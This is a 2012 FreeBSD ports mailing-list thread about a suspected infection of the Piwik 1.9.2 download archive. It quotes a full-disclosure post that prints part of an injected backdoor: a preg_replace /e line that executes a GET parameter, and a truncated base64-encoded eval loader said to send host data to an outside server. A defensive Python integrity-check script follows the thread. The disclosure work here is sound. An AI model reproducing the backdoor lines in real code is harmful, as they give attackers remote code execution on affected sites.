From owner-freebsd-ports@FreeBSD.ORG Tue Nov 27 13:22:09 2012
Delivered-To: ports@freebsd.org
Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 79B3E374; Tue, 27 Nov 2012 13:22:09 +0000 (UTC) (envelope-from nordhaug@hiMolde.no)
Received: from malle.himolde.no (malle.hiMolde.no [158.38.68.22]) by mx1.freebsd.org (Postfix) with ESMTP id CFE628FC13; Tue, 27 Nov 2012 13:22:08 +0000 (UTC)
Received: from harr.himolde.no (harr.hiMolde.no [158.38.68.20]) by malle.himolde.no (8.13.8/8.13.8) with ESMTP id qARD9oQW007064; Tue, 27 Nov 2012 14:09:50 +0100
Received: from harr.himolde.no (harr.himolde.no [127.0.0.1]) by harr.himolde.no (8.13.1/8.13.1) with ESMTP id qARDJ5bY004635; Tue, 27 Nov 2012 14:19:05 +0100
Received: (from nordhaug@localhost) by harr.himolde.no (8.13.1/8.13.1/Submit) id qARDJ5pH004634; Tue, 27 Nov 2012 14:19:05 +0100
Date: Tue, 27 Nov 2012 14:19:05 +0100
From: "Hans Fr. Nordhaug"
To: Ruslan Mahmatkhanov
Subject: Re: Fwd: [Full-disclosure] Possible infection of Piwik 1.9.2 download archive
Message-ID: <20121127131905.GA3839@hiMolde.no>
References: <50B3CE75.9060107@grobecker-wtal.de> <50B4B6E9.9020605@yandex.ru>
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Disposition: inline
In-Reply-To: <50B4B6E9.9020605@yandex.ru>
User-Agent: Mutt/1.4.1i
Cc: FreeBSD Ports Mailing List, ports-secteam@freebsd.org
X-BeenThere: freebsd-ports@freebsd.org
X-Mailman-Version: 2.1.14
Precedence: list
List-Id: Porting software to FreeBSD
X-List-Received-Date: Tue, 27 Nov 2012 13:22:09 -0000

Hi,

I just noticed
http://piwik.org/blog/2012/11/security-report-piwik-org-webserver-hacked-for-a-few-hours-on-2012-nov-26th/
before I got this message. I downloaded http://builds.piwik.org/piwik-1.9.2.tar.gz
and compared it to my local copy of 1.9.2, and all files are unchanged.
It's just the archiving that changed the file size. The Piwik build
manager is a little bit sloppy ...

Regards,
Hans

* Ruslan Mahmatkhanov [2012-11-27]:
> => piwik-1.9.2.tar.gz doesn't seem to exist in /usr/ports/distfiles/.
> => Attempting to fetch http://builds.piwik.org/piwik-1.9.2.tar.gz
> fetch: http://builds.piwik.org/piwik-1.9.2.tar.gz: size mismatch:
> expected 5676196, actual 5676058
>
> -------- Original message --------
> Subject: [Full-disclosure] Possible infection of Piwik 1.9.2 download archive
> Date: Mon, 26 Nov 2012 21:17:57 +0100
> From: Maximilian Grobecker
> To: full-disclosure@lists.grok.org.uk
>
> Hi,
>
> this evening I downloaded a fresh archive of Piwik 1.9.2 and found this
> code at the bottom of the /piwik/core/Loader.php file:
>
> (Just a short snippet)
> -----------snip-------------
> preg_replace("/(.+)/e", $_GET['g'], 'dwm'); exit;
> }
> if (file_exists(dirname(__FILE__)."/lic.log")) exit;
> eval(gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/OhLWNOVrF/IlKatiIlnbIOZ/bpzb2pAyXRl7uF/s
>
> [.......]
>
> -----------/snip-------------
>
> I decoded some parts of this code and found what it does:
> It transmits the requested Host Name (from $_SERVER['HTTP_HOST']) and
> the request URI via POST to http://prostoivse.com/x.php and creates a
> file named "lic.log" in the same directory.
> As long as this file exists it seems that no further POST requests are made.
>
> At the moment I'm trying to figure out the further sense of this code,
> but it seems that there might also be some kind of backdoor (because of
> the use of $_GET).
>
> The file in the downloadable archive is dated at
> Nov 26, 2012 / 18:42 UTC.
>
> From forums I know that some people downloaded the archive earlier this
> day and don't have this code inside their files.
>
> At the moment (at 8:08 PM UTC) the archive is downloadable at the
> original Piwik web site with this obfuscated code.
>
> I contacted the developers and managers of Piwik a few minutes ago about
> this.
>
> --
> Greetings from Wuppertal, Germany
>
> Max Grobecker
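The check Hans describes above (comparing the re-downloaded tarball's contents against a known-good local copy rather than trusting the file size) as an added example; this is not code from the thread or from the Piwik project. It builds constructed in-memory archives with Python's tarfile and gzip modules and compares per-member SHA-256 digests, so a re-archived tarball whose bytes differ reports no changes while a modified core/Loader.php is flagged. The file names and contents are constructed stand-ins, not the real release tree.

```python
import gzip
import hashlib
import io
import tarfile


def member_digests(archive_bytes):
    """Map every regular-file member of a .tar.gz to the SHA-256 of its contents."""
    digests = {}
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r:*") as tar:
        for member in tar:
            if member.isfile():
                data = tar.extractfile(member).read()
                digests[member.name] = hashlib.sha256(data).hexdigest()
    return digests


def compare_archives(trusted, candidate):
    """Return (added, removed, changed) member paths; all empty means identical payload."""
    a, b = member_digests(trusted), member_digests(candidate)
    added = sorted(set(b) - set(a))
    removed = sorted(set(a) - set(b))
    changed = sorted(path for path in a.keys() & b.keys() if a[path] != b[path])
    return added, removed, changed


def build_tgz(files, compresslevel=9, mtime=0):
    """Constructed sample archive from {path: bytes}; gzip settings change the bytes, not the payload."""
    buf = io.BytesIO()
    with gzip.GzipFile(fileobj=buf, mode="wb", compresslevel=compresslevel, mtime=mtime) as gz:
        with tarfile.open(fileobj=gz, mode="w") as tar:
            for path, data in sorted(files.items()):
                info = tarfile.TarInfo(path)
                info.size = len(data)
                tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


# Constructed stand-in for a release tree (not the real Piwik files).
RELEASE = {
    "piwik/index.php": b"<?php require 'core/Loader.php';\n",
    "piwik/core/Loader.php": b"<?php class Piwik_Loader {}\n",
}
TRUSTED = build_tgz(RELEASE)                              # local known-good copy
REPACKED = build_tgz(RELEASE, compresslevel=1, mtime=1)   # same files, merely re-archived
TAMPERED = build_tgz({**RELEASE, "piwik/core/Loader.php":
                      RELEASE["piwik/core/Loader.php"] + b"// constructed: appended code\n"})

if __name__ == "__main__":
    print("repacked:", compare_archives(TRUSTED, REPACKED))  # → ([], [], [])
    print("tampered:", compare_archives(TRUSTED, TAMPERED))  # → ([], [], ['piwik/core/Loader.php'])
```

Against real tarballs, pass the downloaded and the local file bytes to compare_archives; a size mismatch like the one fetch reported is confirmed or cleared by content, not by size alone.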